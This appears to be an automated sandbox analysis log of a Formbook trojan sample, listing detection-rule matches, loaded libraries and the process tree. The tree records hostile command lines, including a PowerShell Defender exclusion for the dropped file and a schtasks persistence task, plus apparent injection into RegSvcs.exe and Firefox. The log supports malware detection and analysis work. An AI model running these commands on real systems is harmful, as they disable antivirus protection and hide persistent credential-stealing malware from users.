                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0133F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01737E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 012AB970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0132EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0175EA12 appears 37 times
                Source: Inquiry files v2.exeStatic PE information: invalid certificate
                Source: Inquiry files v2.exe, 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000002.2228263178.0000000008020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000000.2115239904.0000000000B62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeFkU.exe: vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000002.2217061677.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs Inquiry files v2.exe
                Source: Inquiry files v2.exeBinary or memory string: OriginalFilenameeFkU.exe: vs Inquiry files v2.exe
                Source: Inquiry files v2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Inquiry files v2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: WOzeoJQi.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, O1URIrqBHR6xNO4emT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/12@4/4
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile created: C:\Users\user\AppData\Roaming\WOzeoJQi.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMutant created: \Sessions\1\BaseNamedObjects\QuBizAcdNUraaFYYPQeQ
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile created: C:\Users\user\AppData\Local\Temp\tmp35FF.tmpJump to behavior
                Source: Inquiry files v2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Inquiry files v2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: WOzeoJQi.exe.0.drBinary or memory string: INSERT INTO [dbo].[Repairs] ([CustomerID], [ProductCode], [TechID], [DateReported], [DateRepaired], [Title], [Description]) VALUES (@CustomerID, @ProductCode, @TechID, @DateReported, @DateRepaired, @Title, @Description);
                Source: WOzeoJQi.exe.0.drBinary or memory string: INSERT INTO [dbo].[Customers] ([Name], [City], [State], [ZipCode], [Phone], [Email]) VALUES (@Name, @City, @State, @ZipCode, @Phone, @Email);
                Source: runas.exe, 00000010.00000002.3372111139.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2893579594.00000000030D3000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003126000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2893716360.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2902563374.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Inquiry files v2.exeReversingLabs: Detection: 65%
                Source: Inquiry files v2.exeVirustotal: Detection: 47%
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile read: C:\Users\user\Desktop\Inquiry files v2.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Inquiry files v2.exe "C:\Users\user\Desktop\Inquiry files v2.exe"
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\WOzeoJQi.exe C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
